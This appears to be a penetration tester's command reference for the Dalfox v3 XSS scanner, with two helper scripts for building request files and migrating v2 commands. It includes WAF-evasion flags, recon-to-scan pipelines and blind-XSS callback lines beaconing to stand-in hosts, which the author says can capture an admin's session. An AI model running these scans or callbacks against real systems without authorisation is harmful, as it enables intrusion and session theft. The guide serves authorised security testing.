dalfox is the XSS scanner I reach for first. It is fast, scriptable, and reads from stdin which makes it slot cleanly into a recon pipeline. This is the field reference for the flags that matter, grouped by the task I am trying to accomplish.
Heads-up on v3. Dalfox v3.0.0 (released 2026-05-25) is a complete Rust rewrite. The Go v2 codebase is preserved on the v2 branch for security backports. The most visible change: v2's url, file, pipe, sxss, and server subcommands are gone. v3 has four subcommands (scan, server, payload, mcp) and scan auto-detects the input shape (URL, file, stdin, raw HTTP). Every example below uses the v3 surface.
If you are new to Dalfox, the Dalfox tutorial walking through an attack against a vulnerable app is the right next stop. If you are comparing tools, the best XSS tools list for 2026 covers the alternatives. For the underlying mechanics, the cross-site scripting deep dive has the full taxonomy, with separate writeups on reflected XSS and DOM-based XSS.
Authorisation required
Use these techniques only on systems you own or have written authorisation to test. Unauthorised access to a computer system is a crime in nearly every jurisdiction (US: Computer Fraud and Abuse Act. UK: Computer Misuse Act 1990. EU: Directive 2013/40/EU). This article assumes a sanctioned engagement or a lab environment you control. If you do not have permission, do not run these commands against anything you find on the internet.
Dalfox v3 Command Reference
Every flag organised by task. Copy and adapt.

Target specification (v3: everything is `dalfox scan`)
- `dalfox scan 'https://target.example/q?s=test'`: Single URL. Auto-detected as URL input. Tests every query parameter unless `--param` restricts it.
- `dalfox scan urls.txt`: File input. One URL per line. Auto-detected when the argument is a readable file.
- `cat urls.txt | dalfox scan`: Pipe input. Auto-detected when stdin is piped. The mode you will use most in pipelines (kxss, gau, waybackurls).
- `dalfox scan -i raw-http req.txt`: Raw HTTP request file. v3 selects the mode via `-i raw-http`; the file holds method, headers, cookies and body.
- `dalfox scan url --sxss --sxss-url 'https://target.example/view'`: Stored XSS. v3 replaces v2's `sxss` subcommand with `--sxss` plus `--sxss-url` on a regular scan.
- `dalfox server`: REST API server (separate subcommand). Default port 6664, bound to 127.0.0.1.
- `-X POST`: HTTP method override. Default GET.
- `-d 'username=foo&password=bar'`: Request body. Pair with `-X POST` if the captured request is a POST.
- `-p 'name:query'`: Restrict to a specific parameter. v3 supports a `name:location` form; locations are query, body, json, cookie, header.
- `--ignore-param 'csrf_token,_token'`: Skip anti-CSRF noise parameters.

Detection tuning
- `--workers 50`: Concurrent workers per target. Default 50 in v3.
- `--delay 200`: Milliseconds between requests. Default 0. Use against rate-limited or fragile targets.
- `--timeout 10`: Per-request timeout in seconds. Default 10. Does not bound total scan time.
- `--scan-timeout 600`: Hard wall-clock cap per target for the scan stage, in seconds. 0 (the default) disables it. Use it on partially hung endpoints.
- `--skip-discovery`: Skip all discovery; test only the parameters explicitly present in the URL.
- `--skip-mining`: Skip all parameter mining (dict + DOM).
- `--skip-mining-dict`: Skip dictionary-based parameter mining only.
- `--skip-mining-dom`: Skip DOM-based parameter mining only.
- `--skip-xss-scanning`: Run only discovery, no XSS payloads. Useful for inventory.
- `--only-discovery`: Stop after discovery. Inverse phrasing of `--skip-xss-scanning`.
- `--skip-ast-analysis`: Skip AST-based DOM-XSS analysis. Faster, but loses sink detection on JS-heavy pages.

Parameter mining and discovery
- `-W words.txt`: Mining dictionary wordlist file (`--mining-dict-word`). v3 short form `-W`.
- `--remote-wordlists 'burp,assetnote'`: Pull mining wordlists from the named remote sources.
- `--remote-payloads 'portswigger,payloadbox'`: Pull payloads from the named remote sources. Adds variety beyond the built-ins.
- `-H 'X-Forwarded-For: 127.0.0.1'`: Add a custom header (repeatable). Dalfox also probes for header-injection points.
- `--cookies 'session=abc'`: Add cookies (repeatable). Separate from `-H Cookie:`.
- `--skip-reflection-header`: Skip header-based reflection checks.
- `--skip-reflection-cookie`: Skip cookie-based reflection checks.
- `--skip-reflection-path`: Skip path-based reflection checks.

Payload and reflection control
- `--custom-payload payloads.txt`: Append your own payloads to the built-in set. One per line.
- `--only-custom-payload`: Use ONLY the custom payload file. Disables the built-in payloads entirely.
- `--custom-alert-value 1337`: Replace the default alert value (1). Helps disambiguate findings in shared labs.
- `--custom-alert-type str`: Alert value type. `none` (default) or `str`.
- `--encoders 'url,html'`: Comma-separated encoders. Default `url,html`. Short form `-e`.
- `--inject-marker FUZZ`: Replace this token in the URL/body with payloads. Useful when the injection point is non-standard.
- `--ignore-return '302,403,404'`: HTTP status codes to skip. Cuts false positives on hard-fail endpoints.
- `--follow-redirects`: Follow 3xx redirects (`-F`). Default off.
- `--hpp`: HTTP Parameter Pollution mode. Submits duplicate params to test which one the back-end picks.
- `--deep-scan`: Keep testing additional payloads after the first finding. Slower, better coverage.

Blind XSS
- `-b 'https://xss.example/c/abcd'`: Blind XSS callback URL. Every payload also fires a script that beacons this endpoint.
- `-b 'https://your.interactsh-server.com'`: interactsh as the blind listener. The standard pairing for OOB XSS.
- `--custom-blind-xss-payload tpl.html`: Custom blind payload template file (v3). Use it to ship a richer callback than the default beacon.
- `--skip-xss-scanning -b 'https://...'`: Stored/blind-only run: skip reflection probing and only fire blind payloads against the input.

Stored XSS (replaces v2 `sxss` subcommand)
- `--sxss`: Enable Stored XSS mode on a `scan` run.
- `--sxss-url 'https://target.example/view'`: Retrieval URL. Dalfox sends payloads to the target, then checks for reflection here.
- `--sxss-method GET`: Retrieval method. Default GET.
- `--sxss-retries 3`: How many times to retry the retrieval URL when fetching stored output. Default 3.

Auth, cookies, proxy
- `--cookies 'session=abc'`: Send cookies (repeatable). Required for any authenticated endpoint.
- `--cookie-from-raw cookies.txt`: Load cookies from a raw HTTP request file.
- `-H 'Authorization: Bearer eyJ...'`: Single header (repeatable). Cleaner than packing auth into a request file.
- `--user-agent 'Mozilla/5.0 ...'`: Override the default UA. The Dalfox default is signatured by some WAFs.
- `--proxy 'http://127.0.0.1:8080'`: Route through a proxy. `http://` and `socks5://` are both supported.

Output and reporting
- `-o results.txt`: Write output to a file (`--output`). Format depends on `--format`.
- `-f json`: Output format (`--format`). Default `plain`. Other options: `jsonl`, `markdown`, `sarif`, `toml`.
- `-f jsonl`: JSON Lines. One finding per line. Best for streaming into a pipeline.
- `--silence`: Suppress banner and progress; only emit findings (`-S`). Required for clean pipeline output.
- `--no-color`: Disable ANSI colour. Use when piping to a file or another tool.
- `--include-request`: Include the HTTP request in the output for each finding.
- `--include-response`: Include the response body in the output for each finding.
- `--include-all`: Shorthand for both include flags.
- `--poc-type curl`: PoC rendering: `plain` (default), `curl`, `httpie`, or `http-request`.
- `--stream-findings`: Emit each finding the moment it is verified (plain format only).
- `--dry-run`: Discover and plan without sending payloads. Useful for scope confirmation.

Pipeline patterns
- `kxss < urls.txt | dalfox scan --silence`: Pre-filter with kxss (reflection check), then scan only the reflecting endpoints. Saves hours on large scopes.
- `gau target.example | dalfox scan --silence`: Pull historical URLs from gau (Wayback, Common Crawl, OTX) and pipe them straight into Dalfox.
- `waybackurls target.example | dalfox scan --silence`: Same idea, with waybackurls as the source.
- `subfinder -d target.example | httpx -silent | gau | dalfox scan --silence`: Full recon-to-XSS chain in one line. Subdomains, live hosts, historical URLs, then scan.
- `katana -u target.example -silent | dalfox scan --silence`: Live-crawled URLs from katana into Dalfox. Better coverage of modern SPAs than Wayback alone.

WAF, scope, evasion
- `--waf-bypass auto`: WAF handling. `auto` (default), `force`, or `off`.
- `--waf-evasion`: Auto-throttle on WAF detection (workers=1, delay=3000ms). First knob to turn when a target is filtering naive payloads.
- `--waf-min-confidence 0.3`: Drop WAF fingerprints below this confidence. The default 0.3 suppresses weak matches; 1.0 keeps only high-confidence hits.
- `--skip-waf-probe`: Skip active WAF fingerprinting. Useful when you have already classified the target.
- `--force-waf cloudflare`: Force a named WAF profile when `--waf-bypass force` is set.
- `--include-url 'https?://target\.example/.*'`: Regex scope: only scan URLs matching this pattern.
- `--exclude-url '/logout|/api/internal'`: Regex scope: never scan URLs matching this pattern.
- `--out-of-scope-file oos.txt`: Wildcard domain patterns to skip, one per line.
- `--max-concurrent-targets 50`: Global concurrent targets. Default 50.
- `--max-targets-per-host 100`: Per-host cap. Default 100.

Debug, payload, mcp, update
- `--debug`: Verbose debug output (global flag). Use when a finding looks wrong or the scan terminates early.
- `dalfox payload event-handlers`: Print a built-in payload collection: event-handlers, useful-tags, uri-scheme, portswigger, payloadbox.
- `dalfox mcp`: Run as a Model Context Protocol stdio server, for integration into agentic toolchains.
- `--limit 50 --only-poc v`: Cap the results shown. The `--only-poc` filter accepts `v`, `r`, `a` (verified, reflected, all).
- `--max-payloads-per-param 100`: Cap payloads tested per parameter. 0 (default) means no cap.
- `-V`: Print version (`--version`). Worth pinning in CI so reports are auditable.
req.txt is a raw HTTP request: method line, headers, blank line, body. When the endpoint needs auth, custom headers, or a non-trivial POST body, -i raw-http req.txt is faster than packing every flag manually. Here is what it actually looks like:
GET /search?q=test HTTP/1.1
Host: target.example
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Cookie: session=eyJhbGciOiJIUzI1NiJ9...; PHPSESSID=q9k2...
Connection: close
POST requests look the same with the method and body added:
POST /comment HTTP/1.1
Host: target.example
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=q9k2...
Connection: close

body=hello&author=me
Dalfox tests every parameter it finds in the request unless you restrict with `--param`. No special markers required.
1. Open DevTools (F12 on Windows/Linux, Cmd+Option+I on macOS), Network tab, enable Preserve log.
2. Trigger the target request in the page.
3. Right-click the request, Copy as cURL. Paste into a converter (`curlconverter --language http <command>` from npm) to get raw HTTP, or hand-translate: `-H "Foo: bar"` becomes a header line, `--data 'x=y'` becomes the body.
4. Save as req.txt. Use with `dalfox scan -i raw-http req.txt` in every example below.
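An added example (my own code, not from the Dalfox project or this page's author) that applies the hand-translation rule in step 3 to a DevTools "Copy as cURL" command and emits the req.txt layout shown above. It assumes bash-style quoting and the curl options DevTools commonly emits; `Content-Length` is recomputed from the body bytes rather than copied.

```python
"""Convert a DevTools "Copy as cURL" command into a raw HTTP request file.

Added example for this page; not Dalfox project code. Output follows the
req.txt layout above: request line, headers, blank line, body.
"""
import shlex
import sys
from urllib.parse import urlsplit

# curl options DevTools commonly emits that take no value and carry nothing
# into the request file.
_NO_VALUE_OPTS = {"--compressed", "-s", "--silent", "-k", "--insecure",
                  "-L", "--location", "-i", "--include", "-v", "--verbose"}
_DATA_OPTS = {"-d", "--data", "--data-raw", "--data-binary", "--data-ascii"}


def _value(toks, i, opt):
    """Return the argument following option `opt`, or fail loudly."""
    if i + 1 >= len(toks):
        raise ValueError(f"{opt} is missing its value")
    return toks[i + 1]


def curl_to_raw_http(curl_cmd: str) -> str:
    """Translate one curl command line into a raw HTTP/1.1 request.

    Handles -X/--request, -H/--header, -b/--cookie and the -d family.
    Assumes bash-style quoting (shlex); ANSI-C $'...' strings are not decoded.
    """
    toks = shlex.split(curl_cmd)
    if not toks or toks[0] != "curl":
        raise ValueError("expected a command line starting with 'curl'")
    method = None
    url = None
    headers = []     # (name, value) in the order the browser copied them
    cookies = []     # fragments from -b and from any Cookie: header
    body_parts = []  # each -d chunk; curl joins repeated -d with '&'
    i = 1
    while i < len(toks):
        tok = toks[i]
        if tok in ("-X", "--request"):
            method = _value(toks, i, tok).upper()
            i += 2
        elif tok in ("-H", "--header"):
            name, _, value = _value(toks, i, tok).partition(":")
            if name.strip().lower() == "cookie":
                cookies.append(value.strip())
            else:
                headers.append((name.strip(), value.strip()))
            i += 2
        elif tok in _DATA_OPTS:
            body_parts.append(_value(toks, i, tok))
            i += 2
        elif tok in ("-b", "--cookie"):
            cookies.append(_value(toks, i, tok))
            i += 2
        elif tok in _NO_VALUE_OPTS:
            i += 1
        elif tok.startswith("-"):
            raise ValueError(f"unsupported curl option: {tok}")
        else:
            url = tok
            i += 1
    if url is None:
        raise ValueError("no URL found in curl command")
    parts = urlsplit(url)
    if not parts.netloc:
        raise ValueError("URL must be absolute (scheme://host/path)")
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    body = "&".join(body_parts)
    if method is None:
        # curl itself switches to POST as soon as a -d option is present.
        method = "POST" if body_parts else "GET"
    # Host, Content-Length and Connection are regenerated below, so any stale
    # copies from the browser are dropped rather than trusted.
    keep = [(n, v) for n, v in headers
            if n.lower() not in {"host", "content-length", "connection"}]
    lines = [f"{method} {target} HTTP/1.1", f"Host: {parts.netloc}"]
    lines += [f"{n}: {v}" for n, v in keep]
    if cookies:
        lines.append("Cookie: " + "; ".join(cookies))
    if body_parts:
        if not any(n.lower() == "content-type" for n, _ in keep):
            lines.append("Content-Type: application/x-www-form-urlencoded")
        # Computed from the actual bytes: an off-by-one here makes the server
        # wait for more body or truncate it, and the scan stalls or misfires.
        lines.append(f"Content-Length: {len(body.encode('utf-8'))}")
    lines.append("Connection: close")
    return "\r\n".join(lines) + "\r\n\r\n" + body


if __name__ == "__main__":
    # Usage: paste the copied command on stdin, redirect stdout to req.txt.
    sys.stdout.write(curl_to_raw_http(sys.stdin.read()))
```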
A few command lines I use as starting points and adapt from.
The commands below use placeholders (`:target_url`, `:workers`, `:delay`, `:timeout`, `:ua`, `:blind`) for the values you tune once and reuse; substitute your own before running. One caveat on the user agent: a Googlebot UA usually gets you hard-blocked faster than the default; pick it only when you know the target trusts crawlers.
Simplest possible probe, just a URL with a query string. Good for a first sanity check:
dalfox scan ':target_url' --workers :workers --delay :delay --timeout :timeout --user-agent ':ua'
POST request with form data, no req.txt needed:
dalfox scan 'https://target.example/comment' \
-X POST -d 'body=hello&author=me' \
--workers :workers --delay :delay --user-agent ':ua'
Captured request, light touch, to see if anything reflects:
dalfox scan -i raw-http req.txt --workers :workers --delay :delay --timeout :timeout
Authenticated, scoped to specific parameters:
dalfox scan -i raw-http req.txt -p 'q:query' -p 'filter:query' \
--workers :workers --delay :delay \
--skip-mining --user-agent ':ua'
Behind a WAF, slow and quiet:
dalfox scan -i raw-http req.txt --workers 5 --delay 500 --waf-evasion \
--custom-payload evasion.txt --user-agent ':ua'
Blind XSS run with an interactsh callback:
dalfox scan -i raw-http req.txt -b ':blind' \
--workers :workers --delay :delay --user-agent ':ua'
The pipeline I use most, kxss as a reflection pre-filter so Dalfox only spends payload budget on endpoints that actually echo input:
echo target.example | gau | kxss | awk '{print $NF}' \
| dalfox scan --silence -f jsonl -o findings.jsonl
Full recon chain from a single root domain to confirmed XSS, end to end:
subfinder -d target.example -silent \
| httpx -silent \
| katana -silent \
| dalfox scan --silence -f jsonl -o findings.jsonl
Stored XSS workflow: send payloads to the profile endpoint, then check for reflection on the public view page (v3 replaces `dalfox sxss` with `--sxss`):
dalfox scan 'https://target.example/profile/edit' \
--sxss --sxss-url 'https://target.example/profile/view' \
--cookies 'session=abc' \
--workers :workers --delay :delay
`--silence` and `-f jsonl` are the two flags that matter most for pipeline use. Without them, banner noise and progress spinners corrupt the output stream.
If you have v2 muscle memory, the most common substitutions:
- v2 `dalfox url URL` → v3 `dalfox scan URL`
- v2 `dalfox file urls.txt` → v3 `dalfox scan urls.txt`
- v2 `dalfox pipe` → v3 `dalfox scan` (stdin auto-detected)
- v2 `dalfox sxss URL --trigger T` → v3 `dalfox scan URL --sxss --sxss-url T`
- v2 `-r req.txt` → v3 `-i raw-http req.txt`
- v2 `-w 100` → v3 `--workers 100`
- v2 `-C 'cookie'` → v3 `--cookies 'cookie'`
- v2 `--method=POST` → v3 `-X POST`
- v2 `--format=json` → v3 `-f json`
- v2 `--skip-mining-all` → v3 `--skip-mining`
- v2 `--skip-bav` → removed (BAV is no longer a separate scan stage in v3)
- v2 `--mining-dict-word=w.txt` → v3 `-W w.txt`
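An added example (my own code, not part of this page or the Dalfox project) that applies the substitution table above to saved v2 command lines, for anyone with a library of run scripts to port. Only the mappings listed in the table are applied; any other flag is passed through unchanged, and dropped flags are reported rather than silently lost.

```python
"""Rewrite a Dalfox v2 command line into its v3 equivalent.

Added example for this page; the mapping is the v2-to-v3 substitution table
above and nothing else. Flags outside that table pass through untouched.
"""
from __future__ import annotations

import shlex
import sys

# v2 flag -> v3 replacement tokens (the value, if any, follows them).
_FLAG_MAP = {
    "-r": ["-i", "raw-http"],
    "-w": ["--workers"],
    "-C": ["--cookies"],
    "--method": ["-X"],
    "--format": ["-f"],
    "--trigger": ["--sxss-url"],
    "--mining-dict-word": ["-W"],
    "--skip-mining-all": ["--skip-mining"],
}
# Flags in the map that carry a value, as the next token or as --flag=value.
_TAKES_VALUE = {"-r", "-w", "-C", "--method", "--format", "--trigger",
                "--mining-dict-word"}
# v2 flags with no v3 counterpart: dropped, with a note for the operator.
_REMOVED = {"--skip-bav": "BAV is no longer a separate scan stage in v3"}


def migrate_v2_tokens(cmd: str) -> tuple[list[str], list[str]]:
    """Return (v3 argv, notes). Raises ValueError on malformed input."""
    toks = shlex.split(cmd)
    if len(toks) < 2 or toks[0] != "dalfox":
        raise ValueError("expected 'dalfox <subcommand> ...'")
    sub, rest = toks[1], toks[2:]
    out, notes = ["dalfox", "scan"], []
    if sub in ("url", "file", "sxss"):
        # These v2 subcommands take the target as their first positional.
        if not rest or rest[0].startswith("-"):
            raise ValueError(f"v2 '{sub}' needs a target argument")
        out.append(rest.pop(0))
        if sub == "sxss":
            out.append("--sxss")
    elif sub == "pipe":
        notes.append("'pipe' dropped: v3 auto-detects piped stdin")
    elif sub != "scan":
        raise ValueError(f"unknown subcommand: {sub}")

    i = 0
    while i < len(rest):
        tok = rest[i]
        i += 1
        # --flag=value form: split it so both spellings are handled alike.
        if tok.startswith("--") and "=" in tok:
            name, value = tok.split("=", 1)
        else:
            name, value = tok, None
        if name in _REMOVED:
            notes.append(f"{name} dropped: {_REMOVED[name]}")
        elif name in _FLAG_MAP:
            out.extend(_FLAG_MAP[name])
            if name in _TAKES_VALUE:
                if value is None:
                    if i >= len(rest):
                        raise ValueError(f"{name} is missing its value")
                    value = rest[i]
                    i += 1
                out.append(value)
        else:
            out.append(tok)  # not in the table: unchanged between v2 and v3
    return out, notes


def migrate_v2_command(cmd: str) -> str:
    """Convenience wrapper: the v3 command as one shell-quoted line."""
    argv, _ = migrate_v2_tokens(cmd)
    return shlex.join(argv)


if __name__ == "__main__":
    # Usage: feed one v2 command per line on stdin; notes go to stderr.
    for line in sys.stdin:
        if line.strip():
            argv, notes = migrate_v2_tokens(line)
            print(shlex.join(argv))
            for note in notes:
                print(f"  note: {note}", file=sys.stderr)
```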
- Leave `--config` (the TOML/JSON config file) off if you only scan ad-hoc targets. It is useful when the same scope reappears weekly.
- Leave `--include-request --include-response` off in fast scans; the output balloons quickly. Enable them only when triaging a specific finding.
- Avoid `--only-discovery` on its own; `--skip-xss-scanning` reads more clearly to anyone else reading the run script.
Every flag above is dual use. The same blind callback that catches an admin's session in your bug bounty target is the one I run against my own lab apps weekly. Use these against systems you own or are explicitly authorised to test. See the legal-framing notes in the cross-site scripting deep dive.
What changed between Dalfox v2 and v3?
Does Dalfox find DOM-based XSS or only reflected XSS?
How do I integrate Dalfox with blind XSS infrastructure?
Why does Dalfox miss an XSS I found manually?